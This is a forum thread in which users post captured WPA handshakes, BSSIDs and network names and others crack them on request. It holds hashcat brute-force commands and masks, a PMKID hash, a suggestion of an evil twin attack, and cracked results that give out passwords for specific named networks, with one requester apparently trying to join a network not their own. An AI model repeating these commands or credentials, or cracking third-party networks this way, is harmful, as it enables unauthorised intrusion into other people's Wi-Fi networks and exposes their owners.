WPA / WPA2 Auditing Service

Discussion in 'Community Services' started by Mr. Penguin, 11 Apr 2013.

  1. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    I can't find anything on it to give me an idea of a default mask.
    --- Double Post Merged, 4 May 2020, Original Post Date: 4 May 2020 ---
    If I could get pskracker working I would. It's a big default keyspace.

    Vodaphone_XXXXXXXX - [0-9a-z] - Len: 15
     
    • Friendly Friendly x 1
  2. Rakibul Hassan

    Joined:
    25 Aug 2019
    Messages:
    10
    Likes Received:
    8
    How to get idea of default mask? can you tell me?
     
    • Like Like x 1
  3. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    If you could find a few of the routers that have been cracked we may be able to find a pattern in the keys.

    Could also look for pictures of the labels online?
    --- Double Post Merged, 5 May 2020, Original Post Date: 4 May 2020 ---
    Closest I can figure out from the cap you uploaded before is that it could be 8 characters, a-z, A-Z,0-9.

    Would be a bear.

    [​IMG]
     
    • Like Like x 1
    • Friendly Friendly x 1
  4. mathewgx

    mathewgx Well-Known Member

    Joined:
    26 Sep 2016
    Messages:
    56
    Likes Received:
    49
    Which command would you use?
     
    • Like Like x 1
  5. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    Using hashcat to bruteforce the vodafone one:
    hashcat -m 2500 -a 3 -w 3 1.hccapx ?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1 -1 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

    I tried to fire it up as a test and got an integer overflow error.

    For the tenda earlier:

    hashcat -m 2500 -a 3 -w 3 1.hccapx ?1?1?1?1?1?1?1?1 -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

    At 670 kH/s it would take:
    [​IMG]

    Here is pskracker:
    https://github.com/soxrok2212/PSKracker
     
    #3225 Ntrain2k, 5 May 2020
    Last edited: 5 May 2020
    • Like Like x 1
  6. mathewgx

    mathewgx Well-Known Member

    Joined:
    26 Sep 2016
    Messages:
    56
    Likes Received:
    49
    @Ntrain2k , with pskracker it would be more easy?
    I don't understand how to use it.

    pskracker -t , what would the value of t be?
     
    • Like Like x 1
  7. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    • Like Like x 1
  8. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    526
    The ideal commandline for that would be :
    hashcat -m 2500 -w 4 --status /your.hccapx -a 3 -1 ?u?l?d ?1?1?1?1?1?1?1?1

    but you will get integra overflow - not enough vram, plus this would take foreva to complete.
    try a evil twin attack.
    --- Double Post Merged, 6 May 2020, Original Post Date: 6 May 2020 ---
    -t is the router model
     
    • Like Like x 1
  9. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    Interesting. What does ?u?l?d before the mask do?
     
    • Winner Winner x 1
  10. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    526
    You set the number one to represent upper. lower and digits
    its saves time, then typing:
    abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 :cigar:
     
    • Friendly Friendly x 1
    • Funny Funny x 1
  11. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    Sweet. Thanks!
     
    • Like Like x 1
  12. mathewgx

    mathewgx Well-Known Member

    Joined:
    26 Sep 2016
    Messages:
    56
    Likes Received:
    49
    @petrovivo1234 ,
    How about a new one ?

    ESSID.......: asf
    BSSID.......: 74:4D:28:BB:55:F7
     

    Attached Files:

    • asf.cap
      File size:
      355 KB
      Views:
      5
    • Like Like x 1
  13. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    74:4D:28 Routerboard.com

    That's an odd one....
     
    • Like Like x 1
  14. petrovivo1234

    petrovivo1234 Well-Known Member
    VIP

    Joined:
    19 May 2018
    Messages:
    441
    Likes Received:
    519
    Let see it..
    --- Double Post Merged, 31 May 2020, Original Post Date: 31 May 2020 ---
    Tried 8?d, phone/mobile numbers, some wordlists, names+years, names+2?d, 3?d - nothing..
     

    Attached Files:

    • Like Like x 1
  15. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    526
    Pmkid : a515053fcb68ddad25ff153541b8a207*744d28bb55f7*c46516773684*617366
     
    • Like Like x 1
  16. X-Factor

    X-Factor Well-Known Member

    Joined:
    7 Apr 2018
    Messages:
    25
    Likes Received:
    16
    Here is another one, if someone can give it a try:
    BSSID: 90:F6:52:C6:D8:86
    ESSID: Faroos
    Probables: 10-digit Numeric key, if not that then just try whatever you can.
     

    Attached Files:

    • Like Like x 1
  17. a4apple

    a4apple Active Member

    Joined:
    23 Mar 2014
    Messages:
    59
    Likes Received:
    36
    Can anyone help me with cracking either of these caps? I would really appreciate to those who manage to crack it. I tried bruteforce but little did i know that my laptop is not strong enough to bruteforce which I needed forever to crack one. :( BTW, I am from Malaysia. Please let me know if you need anymore info and I will try my very best to assist. Thank you in advance!

    BSSID: 50:29:F5:DB:35:D1 (Guangdong Oppo Mobile Telecommunications Corp.,Ltd)
    ESSID: ratna nana

    BSSID: A4:B1:E9:98:70:AD (Technicolor)
    ESSID: Nikhanis

    BSSID: C8:3A:35:7B:58:4A (Tenda Technology Co., Ltd.)
    ESSID: Umbile puchong
     

    Attached Files:

    • Like Like x 1
  18. carnivore1

    carnivore1 Well-Known Member

    Joined:
    22 Jul 2018
    Messages:
    128
    Likes Received:
    125
    5029f5db35d1:fe39684ffe43:ratna nana:123454321

    Session..........: hashcat
    Status...........: Cracked
     
    • Like Like x 2
    • Friendly Friendly x 1
  19. a4apple

    a4apple Active Member

    Joined:
    23 Mar 2014
    Messages:
    59
    Likes Received:
    36
    Thank you very much sir! I’ve tried it but unfortunately it couldn’t connect. I wonder why but that’s okay, I mean you helped me and I couldn’t demand much. Maybe I have a crappy laptop. It would be nice if the other two can be cracked as well so that I can try again. Once again thank you!
    --- Double Post Merged, 29 Jun 2020, Original Post Date: 29 Jun 2020 ---
    Managed to obtain few more handshakes. I really do appreciate if someone can help me. BTW, there are TP-Link router, I would like to know if there is any general password for such router?

    BSSID: 50:D4:F7:40:1F:55 (Tp-Link Technologies Co.,Ltd.)
    ESSID: TP-Link 1F55

    BSSID: B0:BE:76:FC:6E:2E
    ESSID: aabbcc111

    BSSID: D8:0D:17:21:62:1C (Tp-Link Technologies Co.,Ltd.)
    ESSID: blue
     

    Attached Files:

    • Like Like x 1
  20. petrovivo1234

    petrovivo1234 Well-Known Member
    VIP

    Joined:
    19 May 2018
    Messages:
    441
    Likes Received:
    519
    50d4f7401f55:d88f7677e09a:TP-Link_1F55:28986344

    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: WPA-EAPOL-PBKDF2
    Hash.Target......: TP-Link_1F55 (AP:50:d4:f7:40:1f:55 STA:d8:8f:76:77:e0:9a)
    Time.Started.....: Mon Jun 29 08:16:04 2020 (58 secs)

    d80d1721621c:c406839f252d:blue:Abcd1234

    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: WPA-EAPOL-PBKDF2
    Hash.Target......: blue (AP:d8:0d:17:21:62:1c STA:c4:06:83:9f:25:2d)
    Time.Started.....: Mon Jun 29 08:19:03 2020 (1 sec)
    Time.Estimated...: Mon Jun 29 08:19:04 2020 (0 secs)


    [*] BSSID=b0:be:76:fc:6e:2e ESSID=aabbcc111 (Length: 9)

    Written 0 WPA Handshakes to:
     
    • Like Like x 3

Share This Page

Loading...